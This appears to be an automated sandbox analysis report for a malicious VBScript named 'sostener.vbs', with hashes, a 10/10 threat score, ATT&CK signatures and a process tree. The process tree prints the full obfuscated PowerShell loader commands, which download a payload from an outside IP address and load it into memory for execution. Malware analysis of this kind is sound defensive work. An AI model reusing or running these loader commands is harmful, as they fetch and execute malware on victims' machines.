Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 19:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    3.3MB

  • MD5

    caa101219c251ee08a30546134d6c2b0

  • SHA1

    23ada7a16f8151997e75fbc7e492ea74eaaf81dc

  • SHA256

    86ca81b6d7f0d020571ab9e3c586d9066bef48f82c3b4aa4abec0e0d86a48765

  • SHA512

    0a241d53ad5bfb3a5e75008968f2cb5d32bf08143e0c0fba29f5447f88cef78d56f822abf5f083413525856edb639e8b8601a8da895ae6d45929b7138c8033a8

  • SSDEEP

    384:bfffftfffftfffftffff9fffftfffftfffftffff4fffftfffftfffftffff9ffH:tDn1C

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹Og☹v☹C8☹OQ☹x☹C4☹Mg☹w☹DI☹Lg☹y☹DM☹Mw☹u☹DE☹Ng☹5☹C8☹V☹Bh☹Gs☹LwBS☹GU☹Zw☹v☹E0☹YQBy☹Ho☹LwBE☹FI☹Rw☹v☹FI☹V☹BD☹C8☹QQBE☹C8☹Z☹Bs☹Gw☹LgB0☹Hg☹d☹☹n☹C☹☹Ow☹k☹EM☹WQBy☹Eo☹U☹☹g☹D0☹I☹☹o☹C☹☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹Ek☹Tw☹u☹F☹☹YQB0☹Gg☹XQ☹6☹Do☹RwBl☹HQ☹V☹Bl☹G0☹c☹BQ☹GE☹d☹Bo☹Cg☹KQ☹g☹Cs☹I☹☹n☹GQ☹b☹Bs☹D☹☹MQ☹u☹HQ☹e☹B0☹Cc☹I☹☹p☹C☹☹OwBJ☹G4☹dgBv☹Gs☹ZQ☹t☹Fc☹ZQBi☹FI☹ZQBx☹HU☹ZQBz☹HQ☹I☹☹t☹FU☹UgBJ☹C☹☹J☹BD☹EM☹UgBo☹G0☹I☹☹t☹E8☹dQB0☹EY☹aQBs☹GU☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹I☹Bw☹G8☹dwBl☹HI☹cwBo☹GU☹b☹Bs☹C4☹ZQB4☹GU☹I☹☹t☹GM☹bwBt☹G0☹YQBu☹GQ☹I☹B7☹C☹☹J☹BD☹Fk☹cgBK☹F☹☹I☹☹9☹C☹☹K☹☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹C☹☹KQ☹g☹Ds☹J☹Bn☹Ec☹aQBt☹EE☹I☹☹9☹C☹☹K☹☹g☹Ec☹ZQB0☹C0☹QwBv☹G4☹d☹Bl☹G4☹d☹☹g☹C0☹U☹Bh☹HQ☹a☹☹g☹CQ☹QwBZ☹HI☹SgBQ☹C☹☹KQ☹g☹Ds☹I☹B9☹C☹☹Ow☹k☹Gw☹ZQBm☹GM☹cw☹g☹D0☹I☹☹n☹D☹☹Jw☹g☹Ds☹J☹B4☹HM☹aQBo☹Gw☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹YgBj☹HI☹c☹B1☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹Cg☹I☹BH☹GU☹d☹☹t☹EM☹bwBu☹HQ☹ZQBu☹HQ☹I☹☹t☹F☹☹YQB0☹Gg☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹Ck☹LgBy☹GU☹c☹Bs☹GE☹YwBl☹Cg☹Jw☹k☹CQ☹Jw☹s☹Cc☹QQ☹n☹Ck☹I☹☹p☹C☹☹OwBb☹FM☹eQBz☹HQ☹ZQBt☹C4☹QQBw☹H☹☹R☹Bv☹G0☹YQBp☹G4☹XQ☹6☹Do☹QwB1☹HI☹cgBl☹G4☹d☹BE☹G8☹bQBh☹Gk☹bg☹u☹Ew☹bwBh☹GQ☹K☹☹k☹GI☹YwBy☹H☹☹dQ☹p☹C4☹RwBl☹HQ☹V☹B5☹H☹☹ZQ☹o☹Cc☹V☹Bl☹Gg☹dQBs☹GM☹a☹Bl☹HM☹W☹B4☹Fg☹e☹B4☹C4☹QwBs☹GE☹cwBz☹DE☹Jw☹p☹C4☹RwBl☹HQ☹TQBl☹HQ☹a☹Bv☹GQ☹K☹☹n☹E0☹cwBx☹EI☹SQBi☹Fk☹Jw☹p☹C4☹SQBu☹HY☹bwBr☹GU☹K☹☹k☹G4☹dQBs☹Gw☹L☹☹g☹Fs☹bwBi☹Go☹ZQBj☹HQ☹WwBd☹F0☹I☹☹o☹C☹☹JwBk☹EE☹Qg☹0☹EE☹S☹BR☹EE☹T☹Bn☹EE☹MgBB☹EY☹TQBB☹FI☹QQBB☹HY☹QQBG☹E0☹QQBW☹Gc☹QgBP☹EE☹RQBV☹EE☹T☹B3☹EI☹NgBB☹Eg☹SQBB☹Fk☹UQBC☹E4☹QQBD☹Dg☹QQBa☹Hc☹QgBs☹EE☹RgBJ☹EE☹T☹B3☹EI☹cgBB☹Ec☹RQBB☹FY☹QQBB☹HY☹QQBE☹Gs☹QQBO☹Gc☹QQB4☹EE☹Qw☹0☹EE☹TQB3☹EE☹egBB☹EQ☹SQBB☹Ew☹ZwBB☹Hk☹QQBE☹EE☹QQBN☹Gc☹QQB1☹EE☹R☹BF☹EE☹TwBR☹EE☹dgBB☹EM☹O☹BB☹E8☹ZwBC☹Hc☹QQBI☹FE☹QQBk☹EE☹QgBv☹EE☹QQ☹9☹D0☹Jw☹g☹Cw☹I☹☹k☹Hg☹cwBp☹Gg☹b☹☹g☹Cw☹I☹☹n☹FI☹ZgBk☹EU☹d☹☹2☹Cc☹L☹☹g☹CQ☹b☹Bl☹GY☹YwBz☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹I☹☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$lefcs = '0' ;$xsihl = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' ;[Byte[]] $bcrpu = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($bcrpu).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgA2AFMARAAvAFMAVgBOAEUALwB6AHIAYQBNAC8AZwBlAFIALwBrAGEAVAAvADkANgAxAC4AMwAzADIALgAyADAAMgAuADEAOQAvAC8AOgBwAHQAdABoAA==' , $xsihl , 'RfdEt6', $lefcs, '1', 'Roda' )) ;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2872
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2876
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2740

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4LQSKIL3JZUWPWRWKGAR.temp
      Filesize

      7KB

      MD5

      93b04eb938c0d4fd6d9633e6f12715f3

      SHA1

      33b09d225044219901bf652bd2254f5153fa6669

      SHA256

      0f394d9b5a4a8042424b3bf76aaefbc67b1d2ee4cd48107014a5ae47410a207c

      SHA512

      0000cafd08ef12423bd2a9f7ef85f6ac8e4a7c6ee6179246f73d5c38778870313d484b722c42d6959cce53715c6b49dc345600baaa34ae7a4ef840f7fa34c77b

      Download Submit

    • memory/1376-4-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1376-7-0x0000000002620000-0x0000000002628000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1376-6-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1376-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1376-10-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1376-9-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1376-8-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1376-11-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1376-22-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

      Filesize

      9.6MB

      Download